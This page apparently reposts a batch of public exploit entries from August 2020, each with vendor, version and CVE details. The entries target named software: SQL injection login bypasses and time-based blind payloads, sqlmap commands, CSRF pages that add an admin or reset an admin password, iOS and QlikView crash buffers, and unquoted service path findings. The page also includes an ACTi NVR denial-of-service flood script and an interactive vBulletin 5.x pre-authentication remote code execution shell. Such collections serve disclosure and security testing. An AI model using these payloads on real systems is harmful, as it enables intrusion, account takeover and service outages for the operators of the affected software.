All posts published by ISHACK AI BOT
-
Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)
# Exploit Title: Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2020-08-03
# Vendor Homepage: https://apps.apple.com/us/app/telnet-lite/id286893976
# Software Link: App Store for iOS devices
# Tested Version: 4.2
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.5.1

# Steps to Produce the Crash:
# 1.- Run python code: Mocha_Telnet_Lite_for_iOS_4.2.py
# 2.- Copy content to clipboard
# 3.- Open "Mocha Telnet Lite for iOS"
# 4.- Configure
# 5.- Click New ... Add a configuration
# 6.- IP Address > "192.168.1.1"
# 7.- Paste ClipBoard on "User"
# 8.- Password > "l4m5"
# 9.- Click Back
# 10.- Click Back
# 11.- Connect
# 12.- Crashed

#!/usr/bin/env python
# Generates the oversized 'User' value that triggers the crash
buffer = "\x41" * 350
print(buffer)
-
Daily Expenses Management System 1.0 - 'username' SQL Injection
# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-08-01
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html

import sys
import requests
import urllib3
import re
import time

urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)


def make_request(url, payload):
    # Requests are routed through a local intercepting proxy on 127.0.0.1:8080
    p = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
    s = requests.Session()
    r = s.post(url, data=payload, proxies=p)
    return r


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("[*] Daily Expenses Management System | username SQL injection")
        print("[*] usage: %s TARGET" % sys.argv[0])
        print("[*] e.g: %s 192.168.0.10" % sys.argv[0])
        sys.exit(-1)

    TARGET = sys.argv[1]
    LOGIN_FORM = "http://%s/dets/" % TARGET

    # Step 1 - Bypass login form
    url = LOGIN_FORM
    p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'}
    r = make_request(url, p1)

    print("[+] Endpoint: %s" % LOGIN_FORM)
    print("[+] Making requests with payload: %s" % p1)

    # A successful bypass lands on the dashboard page
    if re.findall('Dashboard', r.text):
        print("[+] Target vulnerable")
    else:
        print("[-] Error !!!")
-
RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)
# Exploit Title: RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)
# Author: Luis Martinez
# Discovery Date: 2020-08-03
# Vendor Homepage: https://appadvice.com/app/rtsp-viewer/1056996189
# Software Link: App Store for iOS devices
# Tested Version: 1.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.5.1

# Steps to Produce the Crash:
# 1.- Run python code: RTSP_Viewer_for_iOS_1.0.py
# 2.- Copy content to clipboard
# 3.- Open "RTSP Viewer for iOS"
# 4.- Touch the screen
# 5.- Click add (+)
# 6.- Name > "l4m5"
# 7.- Paste ClipBoard on "IP Address"
# 8.- Click Back
# 9.- Message "save is successed" > OK
# 10.- Click created connection (AAAA...)
# 11.- Crashed

#!/usr/bin/env python
# Generates the oversized 'IP Address' value that triggers the crash
buffer = "\x41" * 450
print(buffer)
-
QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)
# Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2020-08-03
# Vendor Homepage: https://www.qlik.com
# Software Link: https://www.qlik.com/us/trial/qlik-sense-business
# Tested Version: 12.50.20000.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: QlikView_12.50.20000.0.py
# 2.- Open QlikView_12.50.20000.0.txt and copy content to clipboard
# 3.- Open "QlikView 12"
# 4.- File -> "Open FTP ..."
# 5.- Paste ClipBoard on "FTP Server Address"
# 6.- Connect
# 7.- Crashed

#!/usr/bin/env python
# Writes the oversized 'FTP Server Address' value to a file for pasting
buffer = "\x41" * 300
f = open("QlikView_12.50.20000.0.txt", "w")
f.write(buffer)
f.close()
-
ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)
# Exploit Title: ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)
#
# Date: 2020-08-04
#
# Exploit Author: MegaMagnus
#
# Vendor Homepage: https://www.acti.com/
#
# Software Link: https://www.acti.com/DownloadCenter
#
# Version: V.3.0.12.42 , V.2.3.04.07
#
# Tested on: Windows 7, Windows 10
#
# CVE: CVE-2020-15956
#
# This is a Proof of Concept Exploit, Please use responsibly.
#
#################################################################################

#!/usr/bin/env python
import requests
from requests.auth import HTTPBasicAuth
import sys


def product_info(server):
    # Fetch the unauthenticated product-info page to confirm the target answers
    try:
        r = requests.get(server + '/media/Product/getProductInfo', timeout=10)
        if r.status_code == 200:
            print(r.text)
            return True
    except Exception as e:
        print(e)
    return False


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: cve-2020-15956.py <target>")
        sys.exit(-1)

    if product_info(sys.argv[1]):
        print("Starting DOS. Use Ctrl-C (SIGINT) to stop!")
        while True:
            try:
                # 760 NUL bytes sent as the Basic-auth password
                payload = b"\x00" * 760
                r = requests.get(sys.argv[1] + '/Media/UserGroup/login',
                                 auth=HTTPBasicAuth('Basic', payload), timeout=10)
                print(r.status_code)
            except KeyboardInterrupt:
                # Ctrl-C stops the loop, as the message above promises
                break
            except Exception as e:
                pass
-
Victor CMS 1.0 - 'Search' SQL Injection
# Exploit Title: Victor CMS 1.0 - 'Search' SQL Injection
# Date: 2020-08-04
# Exploit Author: Edo Maland
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10

-------------------------------------------------------------------------------------------------------------------------------------

# Description:
# The Victor CMS v1.0 application is vulnerable to SQL injection via the 'search' parameter on the search.php page.

# Feature: Search
# Vulnerable file: search.php
# Vulnerable parameter:
#   - search
# PoC Url: http://example.com/CMSsite/search.php
# Method: Post (search="[SQLi]"&submit)
# Payload: 1337'union+select+1,2,version(),database(),5,6,7,8,9,10 -- -

# Burpsuite Requests

POST /CMSsite/search.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: http://example.com
Connection: close
Referer: http://example.com/CMSsite/search.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1

search=1337'union+select+1,2,version(),databases(),5,6,7,8,9,10%20--%20-&submit=

# Sqlmap Command
sqlmap -u "http://example.com/CMSsite/search.php" --data="search=1337*&submit=" --dbs --random-agent -v 3
-
Stock Management System 1.0 - Authentication Bypass
# Exploit Title: Stock Management System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec)
# Date: August 1, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4

# Vulnerable Source Code

if($_POST) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    if(empty($username) || empty($password)) {
        if($username == "") {
            $errors[] = "Username is required";
        }
        if($password == "") {
            $errors[] = "Password is required";
        }
    } else {
        // $username is concatenated straight into the query with no parameterisation
        $sql = "SELECT * FROM users WHERE username = '$username'";
        $result = $connect->query($sql);

        if($result->num_rows == 1) {
            $password = md5($password);
            // exists
            $mainSql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
            $mainResult = $connect->query($mainSql);

            if($mainResult->num_rows == 1) {
                $value = $mainResult->fetch_assoc();
                $user_id = $value['user_id'];
                // set session
                $_SESSION['userId'] = $user_id;
                header('location: http://localhost/stock/dashboard.php');
            } else{
                $errors[] = "Incorrect username/password combination";
            } // /else
        } else {
            $errors[] = "Username doesnot exists";
        } // /else
    } // /else not empty username // password
} // /if $_POST
?>

# Malicious POST Request to https://TARGET/stock/index.php HTTP/1.1

POST /stock/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.132/stock/
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1

email='+or+1%3d1+--+admin&password=badPass
-
CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path
# Exploit Title: CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2020-08-05
# Vendor Homepage: https://www.wibu.com/us/products/codemeter/runtime.html
# Tested Version: 6.60
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """

CodeMeter Runtime Server    CodeMeter.exe    C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe    Auto

# Service info:

C:\>sc qc CodeMeter.exe
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CodeMeter.exe
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : CodeMeter Runtime Server
        DEPENDENCIES       : Tcpip
                           : Winmgmt
        SERVICE_START_NAME : LocalSystem

# Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
-
Daily Expenses Management System 1.0 - 'item' SQL Injection
# Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection
# Date: 2020-08-05
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Version: 1.0
# Tested on: XAMPP / Windows 10

-------------------------------------------------------------------------------------------------------------------------------------

# Feature: Add Expenses
# Vulnerable file: add-expense.php
# Vulnerable parameter:
#   - item
#   - costitem
# PoC Url: http://example.com/dets/add-expense.php
# Method: Post

# Burpsuite Requests

POST /dets/add-expense.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/add-expense.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1

dateexpense=1337-11-11&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=2&submit=

# Payload
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit=

# Sqlmap Command
sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3

-------------------------------------------------------------------------------------------------------------------------------------

# Feature: Edit Profile
# Vulnerable file: user-profile.php
# Vulnerable parameter:
#   - fullname
# PoC Url: http://example.com/dets/user-profile.php
# Method: Post

# Burpsuite Requests

POST /dets/user-profile.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/user-profile.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1

fullname=%27+AND+%28SELECT+2029+FROM+%28SELECT%28SLEEP%285%29%29%29JJJm%29+AND+%27UMUq%27%3D%27UMUq&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=

# Payload
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fullname=admin3' AND (SELECT 2029 FROM (SELECT(SLEEP(5)))JJJm) AND 'UMUq'='UMUq&email=info@sql.id&contactnumber=1337173137&regdate=2020-08-05 13:49:51&submit=

# Sqlmap Command
sqlmap -u "https://example.com/dets/user-profile.php" --data="fullname=admin3*&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=" --random-agent --threads 5 --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" -v 3 --dbs

-------------------------------------------------------------------------------------------------------------------------------------

# Feature: Expense Reports
# Vulnerable file:
#   - expense-monthwise-reports-detailed.php
#   - expense-datewise-reports.php
#   - expense-yearwise-reports.php
# Vulnerable parameter:
#   - fromdate
#   - todate
# PoC Url: http://example.com/dets/expense-monthwise-reports-detailed.php
# Method: Post

# Burpsuite Requests

POST /dets/expense-yearwise-reports-detailed.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/expense-yearwise-reports.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1

fromdate=2020-08-13'+AND+(SELECT+1473+FROM+(SELECT(SLEEP(5)))rhGI)+AND+'moGo'%3d'moGo&todate=2020-08-20&submit=

# Payload
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=2020-08-13' AND (SELECT 1473 FROM (SELECT(SLEEP(5)))rhGI) AND 'moGo'='moGo&todate=2020-07-29&submit=

# Sqlmap Command
sqlmap -u "https://example.com/dets/expense-monthwise-reports-detailed.php" --data="fromdate=2020-08-13*&todate=2020-07-29&submit=" --random-agent --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" --dbs

-------------------------------------------------------------------------------------------------------------------------------------

# Feature: Login Page
# Bypass Login Using SQLi on Admin/Member
# Vulnerable file: index.php
# PoC URL: https://example.com/dets/index.php

Logging in with following details:
- Payload: "' OR 1=1 -- '"@sql.id

# Burp Requests

POST /dets/index.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/index.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1

email="' OR 1=1 -- '"@sql.id&password=1337&login=login
-
All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)
# Discovery by: LiquidWorm
# Discovery Date: 2020-08-05
# Vendor Homepage: https://www.all-dynamics.de

<!DOCTYPE html>
<!--

All-Dynamics Software enlogic:show Digital Signage System 2.0.2 CSRF Add Admin


Vendor: All-Dynamics Software GmbH
Product web page: https://www.all-dynamics.de
Affected version: 2.0.2 (Build 2098) ILP32W 0/1/3/1597919619

Summary: Bring communication with your customers, guests or employees to a new
level. You can design content individually and uncomplicated centrally and simply
present it in different locations. Whether on large displays, steles, digital
signs or on a projector, with enlogic:show your content will appear on the
selected display in a calendar-controlled and precise manner.

Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative privileges if a
logged-in user visits a malicious web site.

Reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5577.php

Tested on: enlogic:show server
           Microsoft Windows Server 2019
           Microsoft Windows Server 2016
           Microsoft Windows Server 2012
           Microsoft Windows 10
           GNU/Linux
           Apache
           PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5576
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5576.php


21.07.2020

-->

<html>
  <body onload="runcsrf()">
    <h2>Grants the user the global administrative right. Administrative users are no longer under the control of the rights structure.</h2>
    <h1>Global: Superior rolebased rights.</h1>
    <!-- First form creates the user; second form assigns the sysadmin flag -->
    <form name="saveuser" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame0">
      <input type="hidden" name="SAVECMD" value="usr_generic" />
      <input type="hidden" name="NEWUSER" value="1" />
      <input type="hidden" name="USERNAME" value="Intruder" />
      <input type="hidden" name="USERFULLNAME" value="ZSL" />
      <input type="hidden" name="USERTAGS" value="tags" />
      <input type="hidden" name="USEREMAIL" value="csrf@zsl.be" />
      <input type="hidden" name="USERPHONE" value="333-222-1111" />
      <input type="hidden" name="PWEXPIRE" value="0" />
      <input type="hidden" name="NEWPW1" value="Pa$$w0rd!" />
      <input type="hidden" name="NEWPW2" value="Pa$$w0rd!" />
      <input type="hidden" name="USERLANG" value="en" />
      <input type="hidden" name="STARTSCREEN" value="display.calendar" />
      <input type="hidden" name="USERCUSTIMEOUT" value="20" />
    </form>
    <form name="addadmin" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame1">
      <input type="hidden" name="SAVECMD" value="usr_rights" />
      <input type="hidden" name="SYSFLAGS[]" value="TYPE_SYSADMIN" />
    </form>
    <iframe name="frame0"></iframe>
    <iframe name="frame1"></iframe>
    <script>
      function runcsrf() {
        document.saveuser.submit();
        document.addadmin.submit();
      }
    </script>
  </body>
</html>
-
Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Title: Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: 2020-08-09
# Vendor Homepage: https://oswapp.com
# Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip
# Version: 1.0
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# CWE-352: Cross-Site Request Forgery (CSRF)
# CVSS Base Score: 7.5
# Impact Subscore: 5.9
# Exploitability Subscore: 1.6
# Vulnerability Description:
#   Cross-Site Request Forgery (CSRF) vulnerability in 'edit_user.php' webpage of OSWAPP's
#   Warehouse Inventory System v1.0 allows remote attackers to change the admin's password
#   via authenticated admin visiting a third-party site.

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://<IP_ADDRESS>/edit_user.php?id=1" method="POST">
      <input type="hidden" name="password" value="Boku123!" />
      <input type="hidden" name="update-pass" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)
# Exploit Title: ManageEngine ADSelfService Plus 6000 – Unauthenticated Remote Code Execution
# Date: 2020-08-08
# Exploit Author: Bhadresh Patel
# Vendor link: https://www.manageengine.com/company.html
# Version: ADSelfService Plus build < 6003
# CVE : CVE-2020-11552

This is an article with PoC exploit video of ManageEngine ADSelfService Plus – Unauthenticated Remote Code Execution Vulnerability

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Title:
====
ManageEngine ADSelfService Plus – Unauthenticated Remote Code Execution Vulnerability

CVE ID:
=======
CVE-2020-11552

Date:
====
08/08/2020 (dd/mm/yyyy)

Vendor:
======
As the IT management division of Zoho Corporation, ManageEngine prioritizes flexible solutions that work for all businesses, regardless of size or budget. ManageEngine crafts comprehensive IT management software with a focus on making your job easier. Our 90+ products and free tools cover everything your IT needs, at prices you can afford. From network and device management to security and service desk software, we're bringing IT together for an integrated, overarching approach to optimize your IT.

Vendor link: https://www.manageengine.com/company.html

Vulnerable Product:
==============
ManageEngine ADSelfService Plus is an integrated self-service password management and single sign-on solution. This solution helps domain users perform self-service password reset, self-service account unlock, employee self-update of personal details (e.g., mobile numbers and photos) in Microsoft Windows Active Directory. ADSelfService Plus also provides users with secure, one-click access to all SAML-supported enterprise applications, including Office 365, Salesforce, and G Suite, through Active Directory-based single sign-on (SSO). For improved security, ADSelfService Plus offers Windows two-factor authentication for all remote and local logins. Administrators find it easy to automate password resets and account unlocks while optimizing IT expenses associated with help desk calls.

Product link: https://www.manageengine.com/products/self-service-password/?meadsol

Abstract:
=======
A remote code execution vulnerability exists in ManageEngine ADSelfService Plus Software when it does not properly enforce user privileges associated with the Windows Certificate Dialog. This vulnerability could allow an unauthenticated attacker to remotely execute commands with system-level privileges on the target Windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability.

Report-Timeline:
=============
27/02/2020: Vendor notified
27/02/2020: Vendor response
28/02/2020: Marked duplicate
11/03/2020: Patch released
23/03/2020: Vendor responded regarding patch release update
26/03/2020: Patch tested and found that it partially fixed the issue. Reported back to the vendor.
18/04/2020: Shared updated report with new PoC
22/04/2020: Vendor acknowledged the issue
24/07/2020: Patch released ( https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6003-release-faceid-support )
08/08/2020: Public disclosure

Affected Software Version:
=============
< ADSelfService Plus build 6003

Exploitation-Technique:
===================
Remote

Severity Rating (CVSS):
===================
9.8 (Critical) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Details:
=======
A remote code execution vulnerability exists in ManageEngine ADSelfService Plus Software when it does not properly enforce user privileges associated with the Windows Certificate Dialog. This vulnerability could allow an unauthenticated attacker to remotely execute commands with system-level privileges on the target Windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability.

The ManageEngine ADSelfService Plus thick client enables a user to perform self-service operations such as password reset and account unlock by using the self-service option on the Windows login screen. Upon selecting this option, the ManageEngine ADSelfService Plus thick client software is launched and connects to a remote ADSelfService Plus server to facilitate the self-service operations.

A security alert can/will be triggered when "an unauthenticated attacker having physical access to the host issues a self-signed SSL certificate to the client", or when "a (default) self-signed SSL certificate is configured on the ADSelfService Plus server". The "View Certificate" option from the security alert allows an attacker with physical access, or a remote attacker with RDP access, to export the displayed certificate to a file. This cascades to the standard dialog/wizard, which opens File Explorer as SYSTEM. By navigating File Explorer to "C:\windows\system32\", a cmd.exe can be launched as SYSTEM.

*PoC Video:*
https://www.youtube.com/watch?v=slZRXffswnQ
01:00 to 05:30 : Setup the environment
05:30 to 06:34 : Exploitation

Credits:
=======
Bhadresh Patel

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Regards,
-Bhadresh
-
BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path
# Exploit Title: BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path
# Discovery Date: 2020-07-31
# Response from BarcodeOCR Support: 08/03/2020
# Exploit Author: Daniel Bertoni
# Vendor Homepage: https://www.barcode-ocr.com/
# Version: 19.3.6
# Tested on: Windows Server 2016, Windows 10

# Find the Unquoted Service Path Vulnerability:

C:\>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

BarcodeOCR    Auto    BarcodeOCR    C:\Program Files (x86)\BarcodeOCR\Service.exe

# Service info (the console below is Italian-localised, so the field names appear in Italian):

C:\>sc qc BarcodeOCR
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BarcodeOCR
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\BarcodeOCR\Service.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : BarcodeOCR
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem

# Exploit:
A successful attempt to exploit this vulnerability could allow an attacker to execute code during startup or reboot with the elevated privileges of the service.
-
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None

# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.

# More info can be found at:
# https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/

#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex

import argparse
import requests
import sys


def run_exploit(vb_loc, shell_cmd):
    post_data = {'subWidgets[0][template]': 'widget_php',
                 'subWidgets[0][config][code]': "echo shell_exec('%s'); exit;" % shell_cmd}
    r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
    return r.text


ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
ARGS = ap.parse_args()

while True:
    try:
        cmd = input("vBulletin5$ ")
        print(run_exploit(ARGS.location, cmd))
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception as e:
        sys.exit(str(e))
-
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)
# Exploit Title: Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)
# Google Dork: -
# Date: 2020-08-01
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.7.zip
# Version: 1.4.7
# Tested on: Linux Ubuntu 18.04
# CVE: CVE-2020-17463

1. Description:
----------------------
Fuel CMS 1.4.7 allows SQL Injection via parameter 'col' in pages/items, permissions/items, navigation/items and logs/items. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2. Proof of Concept:
----------------------
In Burpsuite intercept the request from one of the affected pages with the 'col' parameter and save it as fuel.req. Then run SQLmap to extract the data from the database:

sqlmap -r fuel.req --risk=3 --level=5 --dbs --random-agent

3. Example payload:
----------------------
(time-based blind)
/fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0

4. Burpsuite request:
----------------------
GET /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location%20AND%20(SELECT%201340%20FROM%20(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
